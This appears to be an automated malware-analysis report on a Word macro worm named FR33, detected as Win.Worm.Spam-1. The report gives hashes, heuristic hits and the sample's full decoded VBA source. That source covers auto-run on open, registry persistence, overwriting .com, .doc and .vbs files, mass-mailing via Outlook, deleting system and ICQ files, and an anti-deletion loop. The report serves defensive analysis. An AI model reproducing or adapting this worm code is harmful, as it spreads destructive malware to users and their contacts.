Win.Worm.Spam-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 c1c8c75f96df928e…

MALICIOUS

Office (OLE)

45.5 KB Created: 2000-07-20 09:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: dee9a11ae159dcaee1977ebc72bd8da3 SHA-1: 805fa386d3af5302fc97f4901955475034033f91 SHA-256: c1c8c75f96df928e6b7434896dce22a613de522bc596007134f20c6da8201e26
488 Risk Score

Malware Insights

Win.Worm.Spam-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1037.001 Scripting: Visual Basic Script T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes upon opening the document. This macro uses WScript.Shell to write an entry to the registry Run key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm', which will execute 'wscript.exe c:\windows\FR33.doc %' on system startup. The script also attempts to create a directory 'C:\Windows\lizards' and spread itself to other .com, .doc, and .vbs files on the system.

Heuristics 10

  • ClamAV: Win.Worm.Spam-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Worm.Spam-1
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Doc.TaskVisible = False
Shell "Mkdir C:\Windows\lizards", 0
'Makes the folder lizards in the windows directory
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    'Makes the folder lizards in the windows directory
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    'Makes the folder lizards in the windows directory
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3601 bytes
SHA-256: 660665b0dc9b2f841b4c4528e5c0c02b99a58734677594d0d691313faca272e8
Detection
ClamAV: Win.Worm.Spam-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FR33"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
'The FR33 worm
'This is very deadly but i am not sure if it will work
'by tubuznock
'JUNE 2000

Private Sub Document_Open()
On Error Resume Next
FREE.Visible = False
Doc.TaskVisible = False
Shell "Mkdir C:\Windows\lizards", 0
'Makes the folder lizards in the windows directory
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
End Sub

Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
End If
Next
End Function
'This function infects other files with the FR33.doc
'It infects .com .doc and .vbs files and replaces it with the FR33.doc
Function Subfolders(path)
Set Fold = fso.GetFolder(path)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "com" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "vbs" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "doc" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function

'Hohoho, Outlook Replication
'An e-mail is sent to everyone in the victims address book
'Attaches the worm to every e-mail
Function Outlook()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set Mapi = OutlookApp.GetNameSpace("MAPI")
For Each Addresslist In Mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
Addresslistcout = Addresslist.AddressEntries.Count
For AddList = 1 To Addresslistcout
Set msg = OutlookApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
msg.To = AdEntries.Address
msg.Subject = "Here you have, ;o)"
msg.Body = "Hi:" & vbCrLf & "Check This!"
Set Attachs = msg.Attachments
Attachs.Add "c:\windows\FR33.doc"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End If
End Function

Function FileCopy()
FileCopy "C:\Windows\System\wsock32.dll, C:\Windows\lizards"
End Function

'All this does is first delete the wsock32.dll in the system folder,
'and rename wsock32.dll to wsock32.gos
Function Kill()
Kill "C:\Windows\System\wsock32.dll*.*"
Shell "C:\Windows\lizards\ ren wsock32.dll wsock32.gos", 0
Kill "C:\Program Files\ICQ\DLL\ICQWSOCK32.dll*.*"
Kill "C:\Program Files\ICQ\DLL\RasDLL.dll*.*"
Kill "C:\Program Files\ICQ\icq.exe*.*"
End Function

'This is a loony function i got from [K]Alamar's worm generator
'It is called the anti-deletion method.
'Every time a copy of the Happ00 is deleted a new one is made.
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.